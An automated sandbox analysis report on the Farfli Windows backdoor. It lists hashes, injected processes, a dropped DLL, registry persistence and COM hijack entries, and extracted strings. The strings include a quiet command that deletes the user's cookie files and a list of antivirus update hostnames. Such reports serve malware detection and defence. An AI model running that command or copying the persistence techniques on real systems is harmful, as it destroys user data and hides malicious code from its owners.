Backdoor.Win32.Farfli_8003e1644b
HEUR:Trojan.Win32.Generic (Kaspersky), Packer.Morphine.B (B) (Emsisoft), Packer.Morphine.B (AdAware), Backdoor.Win32.Farfli.FD, GenericEmailWorm.YR, BankerGeneric.YR (Lavasoft MAS)
Behaviour: Banker, Trojan, Backdoor, Worm, EmailWorm
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: 8003e1644b2448254cad8671be23fcb6
SHA1: 5e3ed2c90caf3a5c632a4603278814bacdd8e380
SHA256: 0a80910bd7d7807d9d795a85f759748c8d9140b1129c1dc6650131e697b3cddf
SSDeep: 1536:nQKeJ5YQx8k fmTZDZpYuu7Z6BicRw2zvbu/1AQftI3w103CQUI:ngnxsfGDRuljcLmAuI3K
Size: 74241 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: Morphinev27, UPolyXv05_v6
Company: no certificate found
Created at: 1998-09-28 14:39:39
Analyzed on: WindowsXP SP3 32-bit
Summary:
Backdoor. Malware that enables a remote control of victim's machine.
Payload
| Behaviour | Description |
|---|---|
| EmailWorm | Worm can send e-mails. |
Process activity
The Backdoor creates the following process(es):
%original file name%.exe:1316
The Backdoor injects its code into the following process(es):
mdmi386.exe:1064
svchost.exe:1588
File activity
The process mdmi386.exe:1064 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%System%\AUHook.dll (51 bytes)
%WinDir%\win.ini (106 bytes)
The process %original file name%.exe:1316 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%System%\mdmi386.exe (601 bytes)
Registry activity
The process mdmi386.exe:1064 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\36\DB\06]
"53" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\4C\30\07]
"93" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\30\6E\05]
"F1" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5E\3F\08]
"7A" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3E\60\06]
"C2" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\53\0B\07]
"E8" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3B\A3\06]
"72" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5E\B6\08]
"25" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\54\F0\07]
"F4" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\27\79\05]
"55" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\53\8E\07]
"C0" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5A\AD\08]
"29" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\1E\61\04]
"95" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\4A\3E\07]
"46" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\70\7B\09]
"28" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\74\03\09]
"3e" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\63\83\08]
"89" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\30\77\05]
"F6" = "1"
[HKCR\*\shellex\ContextMenuHandlers\icqlite]
"(Default)" = "{77770022-0D68-4D14-BF25-6747ACFA95DE}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3C\AE\06]
"A2" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\43\47\07]
"19" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\7B\E0\09]
"57" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\55\AD\08]
"12" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\36\98\06]
"52" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\44\B5\07]
"1a" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\54\AA\07]
"E4" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\29\E2\05]
"7E" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3D\18\06]
"C7" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5A\D7\08]
"2d" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\47\4C\07]
"52" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\29\52\05]
"6E" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\53\0E\07]
"EC" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\4C\FF\07]
"83" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\29\5B\05]
"70" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5B\C8\08]
"31" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\4B\DB\07]
"7D" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2F\77\05]
"DB" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\24\44\05]
"13" = "1"
[HKCR\CLSID\{A4C110AE-0291-F12A-2920-F0E455440770}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\37\02\06]
"59" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\24\56\05]
"1a" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\42\20\06]
"C3" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\36\14\06]
"4c" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\37\58\06]
"63" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\1D\D0\04]
"95" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\7A\22\09]
"67" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\pi]
"1~" = "573571897"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\6E\5C\09]
"01" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\35\DF\06]
"48" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\B9\5D\0B]
"74" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\22\9A\04]
"F4" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\36\F3\06]
"5b" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\EA\65\0C]
"F0" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\50\34\07]
"ab" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\7C\0E\09]
"bc" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\49\BC\07]
"31" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\43\A7\07]
"19" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\7E\F5\09]
"aa" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\41\C7\06]
"F8" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3B\0F\06]
"83" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\44\E9\07]
"20" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\63\C9\08]
"00" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5D\9A\08]
"56" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\94\6C\0A]
"7C" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\65\FA\08]
"C7" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\data\pa]
"~01" = "1#ByR0NRZDEFUHSQhFADoaex9y"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2F\5C\05]
"DB" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\57\E1\07]
"80" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\49\14\07]
"38" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\42\12\06]
"F1" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2F\44\05]
"ce" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3B\E2\06]
"A2" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3E\39\06]
"C3" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\73\C2\09]
"31" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\tm\C:]
"(Default)" = "153457"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5A\F4\08]
"43" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\64\90\08]
"6D" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\1F\0C\04]
"C7" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3D\87\06]
"C6" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\30\20\05]
"E3" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\56\B2\08]
"06" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\37\73\06]
"62" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\MRU]
"00" = "pa\~01"
"01" = "pi\1~"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\61\FE\08]
"8E" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5C\DD\08]
"64" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\29\6C\05]
"73" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\30\75\05]
"F0" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\23\84\05]
"05" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2F\89\05]
"D8" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\35\15\06]
"33" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2A\55\05]
"85" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\MRU]
"!2" = "1"
"!1" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\35\BD\06]
"06" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\58\08\07]
"FB" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\95\6D\0A]
"0A" = "1"
[HKCR\CLSID\{A4C110AE-0291-F12A-2920-F0E455440770}\InprocServer32]
"(Default)" = "%System%\AUHook.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2A\59\05]
"8D" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\90\E0\0A]
"86" = "1"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0B 9B A0 56 59 F6 35 ED A3 63 73 46 7E 34 33 D7"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5A\45\08]
"21" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\30\E2\05]
"E2" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5C\8C\08]
"26" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\39\38\06]
"44" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved]
"{77770022-0D68-4D14-BF25-6747ACFA95DE}" = "Shell Extensions for ICQ Lite"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\8E\CC\0A]
"2e" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\23\A7\05]
"0A" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\36\82\06]
"4d" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\EA\2A\0C]
"F7" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3B\D3\06]
"97" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\36\71\06]
"53" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc]
"counter" = "1"
[HKCR\CLSID\{77770022-0D68-4D14-BF25-6747ACFA95DE}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\74\55\09]
"0C" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\59\78\08]
"12" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\14\CE\03]
"B6" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\AC\DA\0B]
"0E" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\22\C0\04]
"F7" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\24\D5\05]
"23" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\70\41\09]
"2b" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\45\7D\07]
"26" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5D\49\08]
"78" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\98\9E\11]
"4c" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\22\66\04]
"C1" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\AB\8B\0B]
"6F" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\22\D8\04]
"F8" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\71\50\09]
"27" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2F\F8\05]
"eb" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2F\D9\05]
"E3" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\data\pi]
"1~" = "1#cFMDSmlYe29vb29vb29vb29vb2tra2tONJI6"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5C\B8\08]
"58" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\29\50\05]
"74" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\35\C1\06]
"3a" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\66\A6\08]
"E6" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\23\60\05]
"02" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2A\6E\05]
"91" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\18\C0\04]
"24" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\BE\94\0B]
"E2" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\0D\A5\0E]
"09" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\tm]
"pi" = "154537"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2F\CB\05]
"E2" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3B\EE\06]
"98" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\32\53\06]
"05" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\27\FD\05]
"57" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\50\29\07]
"86" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\96\35\0A]
"7F" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\48\CF\07]
"3d" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\85\20\0A]
"1f" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2E\BB\05]
"B6" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2E\29\05]
"bf" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2B\E8\05]
"98" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\4D\61\07]
"B2" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\8A\4C\0A]
"13" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3D\F3\06]
"cf" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5C\F5\08]
"63" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\36\6A\06]
"3a" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\54\29\07]
"F8" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad]
"AUHook" = "{BCBCD383-3E06-11D3-91A9-00C04F68105C}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\14\FB\03]
"ce" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\22\89\04]
"E0" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\84\7C\0A]
"1a" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\83\24\09]
"E6" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5A\2A\08]
"26" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3E\A5\06]
"ca" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\67\6C\08]
"EA" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\CE\2D\0C]
"53" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\23\76\05]
"11" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\24\41\05]
"11" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\A8\54\0B]
"6E" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3D\B1\06]
"D5" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3C\24\06]
"B2" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3C\54\06]
"64" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\35\C2\06]
"40" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\71\02\09]
"46" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\70\6B\09]
"46" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\58\A2\08]
"1d" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3D\45\06]
"af" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\50\EB\07]
"8E" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\71\A2\09]
"0D" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\1E\23\04]
"99" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\6B\1F\08]
"A8" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\43\1F\06]
"D9" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\50\19\07]
"77" = "1"
[HKCR\Directory\shellex\ContextMenuHandlers\icqlite]
"(Default)" = "{77770022-0D68-4D14-BF25-6747ACFA95DE}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2E\6C\05]
"B8" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\8B\B6\0A]
"1c" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\28\E9\05]
"6D" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\56\AF\08]
"2a" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\21\E7\04]
"C2" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\46\11\07]
"42" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\34\34\06]
"06" = "1"
[HKCR\CLSID\{77770022-0D68-4D14-BF25-6747ACFA95DE}\InprocServer32]
"(Default)" = "AUHook.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\6F\4C\09]
"29" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\B4\4F\0B]
"6D" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\44\ED\07]
"1c" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\59\AE\08]
"1f" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5C\3C\08]
"48" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\45\71\07]
"3b" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\52\B6\07]
"cc" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\36\FF\06]
"62" = "1"
[HKCR\CLSID\{BCBCD383-3E06-11D3-91A9-00C04F68105C}\InprocServer32]
"(Default)" = "%System%\AUHook.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\53\2C\07]
"de" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3E\65\06]
"D0" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3E\1C\06]
"D8" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\1F\84\04]
"D3" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\60\8C\08]
"37" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\1B\51\03]
"dd" = "1"
To automatically run itself each time Windows is booted, the Backdoor adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Machine Debug Manager" = "mdmi386.exe"
The process %original file name%.exe:1316 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "40 E5 3B 0A 96 A2 DD 6B 03 BB 9B 13 35 7D C6 4B"
Dropped PE files
| MD5 | File path |
|---|---|
| 69cd8f35a41fa1a5c99ee49d9a87bede | c:\WINDOWS\system32\AUHook.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 229376 | 72192 | 5.54111 | 468df37f266b084a63d51d03dbfac71c |
| .idata | 233472 | 4096 | 512 | 0.705801 | 0f0355ba200199275c0ce3814e0ccd62 |
| .tls | 237568 | 4096 | 512 | 0.147711 | 3ce56d9e00101a6b28ba1cc0cce53e97 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
No activity has been detected.
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
Web Traffic was not found.
.data
.code
Portions Copyright (c) 1983,99 Borland
kernel32.dll
update.symantec
liveupdate.symantecliveupdate
secure.nai
sandbox.norman
uk.trendmicro-europe
HTTP/1.1 403
HTTP/1.1 404
wsock32.dll
svchost.exe
Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\
mdmi386.exe
AUHook.dll
AUHook.dat
7A5417FF-2D82-553C-F326-2861000FFFF3-0E
sfc.dll
cmd /q /c "echo ! && ver && echo. && echo Y | del "%USERPROFILE%\cookies\*.*" && cls "
.text
.idata
.edata
.XV^x
.b.Im
advapi32.dll
RegOpenKeyA
gdi32.dll
ole32.dll
oleaut32.dll
RASAPI32.dll
SHLWAPI.DLL
user32.dll
wininet.dll
core.dll
KWindows
Porti
.ex)N
.MS'fc
"#$%&'()
dD.Gz
P|.Zc
.Cu`k&
.nEZK
adv0pi32x.ql
mdmi386.exe_1064_rwx_003B1000_0000C000:
h.dllhel32hkernT
.XV^x
.rsrc
.\kernel32.dll
@%.lI
,ey.yYeX
auth_loginByP
[.kyALFAIBSR/b
!!PASSC"T
2z?URL:
7A5417FF-2D82-553C-F326
/show.php HTTP/1.0
%xt/0R, im}
-url%c[
.bm a
.DirE
.tB"d
SPV%Dl
=.Ru!
1s.Hf] *
Cert
TALCMD\\
OPERA
d.lThi
-me}@l
a.cfI
KP.SJ
y.kpug5
.bpbk
.FGDV
KERNEL32.DLL
advapi32.dll
gdi32.dll
ole32.dll
oleaut32.dll
RASAPI32.dll
SHLWAPI.DLL
user32.dll
wininet.dll
wsock32.dll
RegOpenKeyA
core.dll
mdmi386.exe_1064_rwx_00401000_00012000:
h.dllhel32hkernT
.data
.code
Porti
.ex)N
.MS'fc
"#$%&'()
dD.Gz
P|.Zc
.Cu`k&
.nEZK
adv0pi32x.ql
kernel32.dll
mdmi386.exe_1064_rwx_00B30000_00028000:
`.rsrc
Portions Copyright (c) 1983,99 Borland
kernel32.dll
update.symantec
liveupdate.symantecliveupdate
secure.nai
sandbox.norman
uk.trendmicro-europe
